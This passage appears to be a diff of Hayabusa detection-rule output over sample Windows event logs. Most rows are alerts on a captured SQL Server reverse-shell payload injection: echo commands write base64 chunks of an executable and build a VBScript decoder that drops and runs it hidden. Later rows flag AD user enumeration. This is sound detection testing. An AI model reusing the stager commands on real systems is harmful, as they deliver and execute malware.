AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x12a4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:26.169 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xa30 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:26.444 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAEAEAAAABgAAIAAAAAAAAAAAAAAAAAAAAEAAQAAADAAAIAAAAAAAAAAAAAAAAAAAAEACQQAAEgAAABgUAEAaAcAAAAAAAAAAAAAAAAAAAAAAABoBzQAAABWAFMAXwBW>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x7e4 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:26.718 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AEUAUgBTAEkATwBOAF8ASQBOAEYATwAAAAAAvQTv/gAAAQACAAIAAAAOAAIAAgAAAA4APwAAAAAAAAAEAAAAAQAAAAAAAAAAAAAAAAAAAMYGAAABAFMAdAByAGkAbgBnAEYAaQBsAGUASQBuAGYAbwAAAKIGAAABADAANAAwADkAMAA0AGIAMAAAADAEDAIBAEMAbwBtAG0AZQBuAHQAcwAAAEwAaQBjAGUAbgBzAGUAZAAgAHUAbgBkAGUAcgAgAHQAaABlACAAQQBwAGEAYwBoAGUAIABMAGkAYwBlAG4AcwBlACwAIABWAGUAcgBzAGkAbwBuACAAMgAuADAAIAAoAHQAaABlACAAIgBMAGkAYwBlAG4AcwBlACIAKQA7ACAAeQBvAHUAIABtAGEAeQAgAG4AbwB0ACAAdQBzAGUAIAB0AGgAaQBzACAAZgBpAGwAZQAgAGUAeABjAGUAcAB0ACAAaQBuACAAYwBvAG0AcABsAGkAYQBuAGMAZQAgAHcAaQB0AGgAIAB0AGgAZQAgAEwAaQBjAGUAbgBzAGUALgAgAFkAbwB1ACAAbQBhAHkAIABvAGIAdABhAGkAbgAgAGEAIABjAG8AcAB5ACAAbwBmACAAdABoAGUAIABMAGkAYwBlAG4AcwBlACAAYQB0AA0ACgANAAoAaAB0AHQAcAA6AC8ALwB3AHcAdwAuAGEAcABhAGMAaABlAC4AbwByAGcALwBsAGkAYwBlAG4AcwBlAHMALwBMAEkAQwBFAE4AUwBFAC0AMgAuADAADQAKAA0ACgBVAG4AbABlAHMAcwAgAHIAZQBxAHUAaQByAGUAZAAgAGIAeQAgAGEAcABwAGwAaQBjAGEAYgBsAGUAIABsAGEAdwAgAG8AcgAgAGEAZwByAGUAZQBkACAAdABvACAAaQBuACAAdwByAGkAdABpAG4AZwAsACAAcwBvAGYAdAB3AGEAcgBlACAAZABpAHMAdAByAGkAYgB1AHQAZQBkACAAdQBuAGQAZQByACAAdABoAGUAIABMAGkAYwBlAG4AcwBlACAAaQBzACAAZABpAHMAdAByAGkAYgB1AHQAZQBkACAAbwBuACAAYQBuACAAIgBBAFMAIABJAFMAIgAgAEIAQQBTAEkAUwAsACAAVwBJAFQASABPAFUAVAAgAFcAQQBSAFIAQQBOAFQASQBFAFMAIABPAFIAIABDAE8ATgBEAEkAVABJAE8ATgBTACAATwBGACAAQQBOAFkAIABLAEkATgBEACwAIABlAGkAdABoAGUAcgAgAGUAeABwAHIAZQBzAHMAIABvAHIAIABpAG0AcABsAGkAZQBkAC4AIABTAGUAZQAgAHQAaABlACAATABpAGMAZQBuAHMAZQAgAGYAbwByACAAdABoAGUAIABzAHAAZQBjAGkAZgBpAGMAIABsAGEAbgBnAHUAYQBnAGUAIABnAG8AdgBlAHIA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x9b8 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:26.991 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo bgBpAG4AZwAgAHAAZQByAG0AaQBzAHMAaQBvAG4AcwAgAGEAbgBkACAAbABpAG0AaQB0AGEAdABpAG8AbgBzACAAdQBuAGQAZQByACAAdABoAGUAIABMAGkAYwBlAG4AcwBlAC4AAABWABsAAQBDAG8AbQBwAGEAbgB5AE4AYQBtAGUAAAAAAEEAcABhAGMAaABlACAAUwBvAGYAdAB3AGEAcgBlACAARgBvAHUAbgBkAGEAdABpAG8AbgAAAAAAagAhAAEARgBpAGwAZQBEAGUAcwBjAHIAaQBwAHQAaQBvAG4AAAAAAEEAcABhAGMAaABlAEIAZQBuAGMAaAAgAGMAbwBtAG0AYQBuAGQAIABsAGkAbgBlACAAdQB0AGkAbABpAHQAeQAAAAAALgAHAAEARgBpAGwAZQBWAGUAcgBzAGkAbwBuAAAAAAAyAC4AMgAuADEANAAAAAAALgAHAAEASQBuAHQAZQByAG4AYQBsAE4AYQBtAGUAAABhAGIALgBlAHgAZQAAAAAAggAvAAEATABlAGcAYQBsAEMAbwBwAHkAcgBpAGcAaAB0AAAAQwBvAHAAeQByAGkAZwBoAHQAIAAyADAAMAA5ACAAVABoAGUAIABBAHAAYQBjAGgAZQAgAFMAbwBmAHQAdwBhAHIAZQAgAEYAbwB1AG4AZABhAHQAaQBvAG4ALgAAAAAANgAHAAEATwByAGkAZwBpAG4AYQBsAEYAaQBsAGUAbgBhAG0AZQAAAGEAYgAuAGUAeABlAAAAAABGABMAAQBQAHIAbwBkAHUAYwB0AE4AYQBtAGUAAAAAAEEAcABhAGMAaABlACAASABUAFQAUAAgAFMAZQByAHYAZQByAAAAAAAyAAcAAQBQAHIAbwBkAHUAYwB0AFYAZQByAHMAaQBvAG4AAAAyAC4AMgAuADEANAAAAAAARAAAAAEAVgBhAHIARgBpAGwAZQBJAG4AZgBvAAAAAAAkAAQAAABUAHIAYQBuAHMAbABhAHQAaQBvAG4AAAAAAAkEsAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0xe90 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:27.266 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA>>%TEMP%\feyQV.b64 | Path: C:\Windows\System32\cmd.exe | PID: 0x3bc | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:27.540 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATkIxMAAAAAA2gMFKAQAAAEM6XGxvY2FsMFxhc2ZccmVsZWFzZVxidWlsZC0yLjIuMTRcc3VwcG9ydFxSZWxlYXNlXGFiLnBkYgA=>>%TEMP%\feyQV.b64 & echo Set fs = CreateObject(""Scripting.FileSystemObject"") >>%TEMP%\UbdXv.vbs & echo Set file = fs.GetFile(""%TEMP%\feyQV.b64"") >>%TEMP%\UbdXv.vbs & echo If file.Size Then >>%TEMP%\UbdXv.vbs & echo Set fd = fs.OpenTextFile(""%TEMP%\feyQV.b64"", 1) >>%TEMP%\UbdXv.vbs & echo data = fd.ReadAll >>%TEMP%\UbdXv.vbs & echo data = Replace(data, vbCrLf, """") >>%TEMP%\UbdXv.vbs & echo data = base64_decode(data) >>%TEMP%\UbdXv.vbs & echo fd.Close >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1294 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:27.815 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Set ofs = CreateObject(""Scripting.FileSystemObject"").OpenTextFile(""%TEMP%\TVupu.exe"", 2, True) >>%TEMP%\UbdXv.vbs & echo ofs.Write data >>%TEMP%\UbdXv.vbs & echo ofs.close >>%TEMP%\UbdXv.vbs & echo Set shell = CreateObject(""Wscript.Shell"") >>%TEMP%\UbdXv.vbs & echo shell.run ""%TEMP%\TVupu.exe"", 0, false >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo Wscript.Echo ""The file is empty."" >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo Function base64_decode(byVal strIn) >>%TEMP%\UbdXv.vbs & echo Dim w1, w2, w3, w4, n, strOut >>%TEMP%\UbdXv.vbs & echo For n = 1 To Len(strIn) Step 4 >>%TEMP%\UbdXv.vbs & echo w1 = mimedecode(Mid(strIn, n, 1)) >>%TEMP%\UbdXv.vbs & echo w2 = mimedecode(Mid(strIn, n + 1, 1)) >>%TEMP%\UbdXv.vbs & echo w3 = mimedecode(Mid(strIn, n + 2, 1)) >>%TEMP%\UbdXv.vbs & echo w4 = mimedecode(Mid(strIn, n + 3, 1)) >>%TEMP%\UbdXv.vbs & echo If Not w2 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w1 * 4 + Int(w2 / 16)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w3 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w2 * 16 + Int(w3 / 4)) And 255)) >>%TEMP%\UbdXv.vbs & echo If Not w4 Then _ >>%TEMP%\UbdXv.vbs & echo strOut = strOut + Chr(((w3 * 64 + w4) And 255)) >>%TEMP%\UbdXv.vbs & echo Next >>%TEMP%\UbdXv.vbs & echo base64_decode = strOut >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & echo Function mimedecode(byVal strIn) >>%TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0x1024 | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:28.092 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: ""C:\Windows\system32\cmd.exe"" /c echo Base64Chars = ""ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"" >>%TEMP%\UbdXv.vbs & echo If Len(strIn) = 0 Then >>%TEMP%\UbdXv.vbs & echo mimedecode = -1 : Exit Function >>%TEMP%\UbdXv.vbs & echo Else >>%TEMP%\UbdXv.vbs & echo mimedecode = InStr(Base64Chars, strIn) - 1 >>%TEMP%\UbdXv.vbs & echo End If >>%TEMP%\UbdXv.vbs & echo End Function >>%TEMP%\UbdXv.vbs & cscript //nologo %TEMP%\UbdXv.vbs | Path: C:\Windows\System32\cmd.exe | PID: 0xc0c | User: Svc-SQL-DB01 | LID: 0x1304385",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 07:58:28.113 +09:00,mssql01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: cscript //nologo C:\Users\SVC-SQ~1\AppData\Local\Temp\UbdXv.vbs | Path: C:\Windows\System32\cscript.exe | PID: 0x1218 | User: Svc-SQL-DB01 | LID: 0x1304385,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1059.003-Windows Command Shell/ID4688-SQL Server payload injectection for reverse shell (MSF).evtx
+2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
+2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
